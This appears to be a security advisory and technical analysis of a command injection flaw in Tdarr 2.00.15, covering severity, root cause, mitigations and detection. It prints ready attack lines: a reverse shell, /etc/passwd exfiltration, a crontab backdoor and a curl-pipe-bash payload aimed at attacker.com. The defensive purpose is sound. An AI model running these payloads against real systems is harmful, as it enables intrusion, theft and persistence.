CVE-2022-50919
Weakness (CWE)
CVSS Vector (v4.0)
- Attack Vector: Network
- Attack Complexity: Low
- Attack Requirements: None
- Privileges Required: None
- User Interaction: None
- Confidentiality (Vulnerable System): High
- Integrity (Vulnerable System): High
- Availability (Vulnerable System): High
- Confidentiality (Subsequent System): None
- Integrity (Subsequent System): None
- Availability (Subsequent System): None
Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal: the user-supplied argument is passed to a shell without filtering, so an attacker can append shell metacharacters and chain arbitrary commands. A payload such as `--help; curl .py | python` downloads a remote Python script and pipes it straight into the interpreter, all without authenticating.
Comprehensive Technical Analysis of CVE-2022-50919
CVE ID: CVE-2022-50919
CVSS Score: 9.8 (Critical)
Affected Software: Tdarr 2.00.15
Vulnerability Type: Unauthenticated Remote Code Execution (RCE) via Command Injection
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
CVE-2022-50919 is a critical unauthenticated remote code execution (RCE) vulnerability in Tdarr 2.00.15, a media transcoding and management application. The flaw resides in the Help terminal functionality, where insufficient input sanitization allows attackers to inject and chain arbitrary shell commands.
CVSS v3.1 Vector Breakdown
The vector block at the top of this page is the CVSS v4.0 rendering of the same finding (v4.0 has no Scope metric and splits impact into vulnerable and subsequent systems); the 9.8 score quoted here comes from the v3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
| Metric | Value | Explanation |
|---|---|---|
| AV | Network (N) | Exploitable remotely over the network. |
| AC | Low (L) | No special conditions, race or preparation needed; a single request suffices. |
| PR | None (N) | No authentication or privileges required. |
| UI | None (N) | No user interaction needed. |
| S | Unchanged (U) | Impact is confined to the host running Tdarr, the vulnerable component's own security scope. |
| C | High (H) | Arbitrary commands can read any file the Tdarr account can read. |
| I | High (H) | Arbitrary commands can modify files, configuration and running state. |
| A | High (H) | The service or host can be stopped, wiped or taken over outright. |
Resulting CVSS Score: 9.8 (Critical)
Severity Justification
- Unauthenticated RCE is among the most severe vulnerabilities, as it allows attackers to execute arbitrary code without prior access.
- Low attack complexity combined with no required privileges and no user interaction makes exploitation trivial: one crafted request.
- High impact on confidentiality, integrity, and availability (CIA triad) due to potential full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability stems from improper input sanitization in Tdarr’s Help terminal, which allows command chaining via shell metacharacters (e.g., ;, |, &&). Attackers can inject malicious commands that execute with the privileges of the Tdarr process.
Exploitation Steps:
- Identify Target: locate a Tdarr 2.00.15 instance reachable over the internet or an internal network.
- Craft Malicious Payload: submit a help argument with a command appended after a shell separator, for example:
  --help; curl http://attacker.com/malicious.py | python
  This fetches a Python script from an attacker-controlled server and pipes it straight into the interpreter.
- Execute Payload: the injected command runs with the privileges of the Tdarr service, which is often root or another high-privilege account when the container or service was not set up with a dedicated user.
- Post-Exploitation: attackers may:
  - Deploy malware (e.g., ransomware, cryptominers).
  - Establish persistence (e.g., reverse shell, backdoor).
  - Exfiltrate sensitive data.
  - Pivot to other systems in the network.
Proof-of-Concept (PoC) Exploit
A public PoC exists (Exploit-DB #50822). The request shape below follows that PoC; confirm the exact endpoint path and parameter name against the build you are testing before relying on it, and note that a `;` in a query string is normally sent percent-encoded as `%3B`:
GET /api/v2/help?command=--help;id HTTP/1.1
Host: vulnerable-tdarr-server
Expected Output (when the service runs as root):
uid=0(root) gid=0(root) groups=0(root)
Any `id` output confirms command execution; the uid tells you which account the attacker now controls. Root means full host compromise, whereas a dedicated `tdarr` user bounds the blast radius to what that account can reach.
3. Affected Systems and Software Versions
Vulnerable Software
- Tdarr 2.00.15 (confirmed vulnerable).
- Other versions: earlier releases may also be affected if they share the same Help terminal code path; this has not been confirmed and requires verification against each build in use.
Deployment Scenarios at Risk
- Self-hosted Tdarr instances (common in home labs, media servers, and enterprise transcoding environments).
- Cloud-based deployments (if exposed to the internet).
- Internal networks (lateral movement risk if Tdarr is accessible).
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade Tdarr:
  - Apply the latest patch (if available) or upgrade to a version that no longer exhibits the Help terminal injection.
  - Monitor Tdarr's official releases for security updates.
- Network-Level Protections:
  - Restrict Access: use firewalls to limit access to Tdarr's web interface (default port 8265) to the hosts that need it.
  - Segmentation: isolate Tdarr in a dedicated VLAN or DMZ to limit lateral movement.
  - WAF Rules: deploy a Web Application Firewall (WAF) to block command injection patterns (e.g., `;`, `|`, `&&`) in the help parameter. Treat this as a stopgap: the WAF sees the percent-encoded request, so rules must match on the decoded value, and encoding tricks routinely bypass pattern-only filters.
- Temporary Workarounds:
  - Disable the Help Terminal: if it is not needed, remove or restrict access to the Help API endpoint.
  - Run as Non-Root: run Tdarr under a dedicated low-privilege `tdarr` user (or a non-root container user) so that a successful injection does not hand the attacker root.
Long-Term Hardening
- Input Validation & Sanitization:
  - Validate every API parameter against an allowlist of the exact values the endpoint expects; reject anything containing shell metacharacters (`;`, `|`, `&`, `$`, backticks, newlines) rather than trying to strip them.
  - Spawn helper binaries with an argument vector and no shell, so metacharacters cannot become syntax at all; filtering is the second line of defence, not the first.
- Code Review & Security Testing:
  - Conduct a static application security testing (SAST) scan to identify similar command injection flaws (any `exec`/`spawn` with `shell: true` fed by request data).
  - Perform dynamic application security testing (DAST) to validate fixes.
- Monitoring & Detection:
  - Log Suspicious Activity: monitor for unusual command execution patterns in Tdarr logs.
  - Intrusion Detection: deploy IDS/IPS rules to detect exploitation attempts (e.g., `curl ... | python` patterns in request parameters).
- Zero Trust Architecture:
  - Enforce least-privilege access for Tdarr and associated services.
  - Implement multi-factor authentication (MFA) for administrative access.
5. Impact on the Cybersecurity Landscape
Exploitation Trends
- High Likelihood of Exploitation: given the CVSS 9.8 score and a public PoC, this vulnerability is attractive to:
  - Opportunistic attackers (e.g., botnets, cryptominers) scanning for the exposed port.
  - Advanced Persistent Threats (APTs) looking for initial access.
  - Ransomware affiliates (LockBit, BlackCat and similar) as a foothold for lateral movement. These are the actor classes that routinely pick up unauthenticated RCE in internet-exposed services; none is specifically tied to this CVE here.
Broader Implications
- Supply Chain Risks:
  - Tdarr is often used in media processing pipelines, which may integrate with other systems (e.g., databases, storage).
  - A compromised transcoder can exfiltrate data or poison downstream content (e.g., by planting malicious media files).
- Home Lab & SMB Exposure:
  - Many Tdarr instances run in home labs or small businesses with minimal security controls.
  - Attackers may target these for botnet recruitment or cryptojacking.
- Regulatory & Compliance Risks:
  - Organizations handling sensitive media (e.g., healthcare, legal) may face GDPR, HIPAA, or CCPA consequences if data is exfiltrated.
- Threat Intelligence & Hunting:
  - Security teams should hunt for exploitation attempts in logs (e.g., `curl`, `wget`, `python` commands inside HTTP request parameters).
  - Threat feeds (e.g., AlienVault OTX, MISP) should carry this CVE so patching is prioritized.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path:
  - The Help terminal in Tdarr 2.00.15 passes user input straight into a shell command without sanitization.
  - Illustrative reconstruction of that pattern (not Tdarr's actual source; the handler and parameter names are assumed):
const { exec } = require('child_process');

function handleHelpRequest(req, res) {
  const userInput = req.query.command;                 // attacker-controlled, never validated
  // UNSANITIZED INPUT: exec() hands this string to /bin/sh, so metacharacters become syntax
  exec(`tdarr --help ${userInput}`, (error, stdout, stderr) => {
    res.send(stdout);
  });
}
  - Because the string reaches a shell, an attacker breaks out of the intended command with `;`, `|`, or `&&`, and everything after the separator runs as a new command.
Exploitation Chaining
Attackers can chain multiple commands for post-exploitation:
- Reverse Shell:
  --help; bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
- Data Exfiltration:
  --help; curl -F "file=@/etc/passwd" http://attacker.com/upload
- Persistence (requires write access to `/etc/crontab`, i.e., the service running as root):
  --help; echo "*/5 * * * * root curl http://attacker.com/backdoor.sh | bash" >> /etc/crontab
Detection & Forensics
- Log Analysis:
  - Check Tdarr's logs (`/var/log/tdarr/` in this write-up; the actual location depends on how Tdarr was installed) for:
    - Unusual command sequences (e.g., `;`, `|`, `&&`) in help-related entries.
    - Outbound connections to unknown IPs (e.g., spawned `curl`, `wget`).
  - Example suspicious log entry:
    [2026-01-14 12:00:00] INFO: Executing: tdarr --help; curl http://evil.com/malware.sh | bash
- Network Forensics:
  - Analyze HTTP request patterns to `/api/v2/help` for:
    - Long or malformed `command` parameters.
    - Base64-encoded payloads (e.g., `echo <base64> | base64 -d | bash`).
  - Match on the percent-decoded parameter value: the wire form of `--help;id` is `--help%3Bid`, so a rule that looks for a literal `;` in the raw request line will miss it.
- Endpoint Detection:
  - Monitor for unexpected child processes of `tdarr` (e.g., `bash`, `python`, `curl`); a transcoder legitimately spawns FFmpeg/HandBrake workers, not a shell fed from curl.
  - Use EDR/XDR solutions to detect anomalous process execution.
Proof-of-Concept (PoC) Walkthrough
- Identify Target:
  nmap -p 8265 <target-ip> -sV
  Confirm Tdarr is running on port 8265.
- Exploit (same caveat as above: verify the endpoint path against the build under test, and percent-encode `;` as `%3B` if your client does not):
  curl "http://<target-ip>:8265/api/v2/help?command=--help;id"
  Expected output: `uid=0(root) gid=0(root)` if the service runs as root; otherwise the uid of the Tdarr service account.
- Weaponized Exploit:
  curl "http://<target-ip>:8265/api/v2/help?command=--help;curl http://attacker.com/shell.sh | bash"
  where `shell.sh` contains a reverse shell payload. The literal space and `|` are shown unencoded for readability; on the wire they must be `%20` and `%7C` (or let curl encode them with `-G --data-urlencode "command=..."`).
Conclusion & Recommendations
CVE-2022-50919 represents a critical unauthenticated RCE vulnerability with severe implications for affected systems. Given the public PoC and low exploitation complexity, organizations must prioritize patching and implement compensating controls immediately.
Key Takeaways for Security Teams:
✅ Patch Immediately: upgrade Tdarr to the latest secure version.
✅ Isolate & Monitor: restrict network access and monitor for exploitation attempts.
✅ Hunt for IOCs: check logs for command injection patterns and unusual outbound connections.
✅ Hardening: apply least-privilege principles and input validation to prevent similar flaws.
By addressing this vulnerability proactively, organizations can mitigate the risk of compromise and strengthen their overall security posture.